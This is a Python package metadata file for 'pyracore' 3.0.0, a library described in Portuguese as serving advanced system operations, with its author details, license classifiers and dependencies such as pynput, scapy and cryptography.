Metadata-Version: 2.2
Name: pyracore
Version: 3.0.0
Summary: Uma biblioteca modular para operações avançadas em sistemas.
Home-page: https://github.com/joaquimtimoteo/pyracore
Author: Joaquim Carlos Timóteo
Author-email: joaquimcarlostimoteo1@gmail.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Requires-Dist: cryptography
Requires-Dist: pynput
Requires-Dist: requests
Requires-Dist: scapy
Requires-Dist: psutil
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary
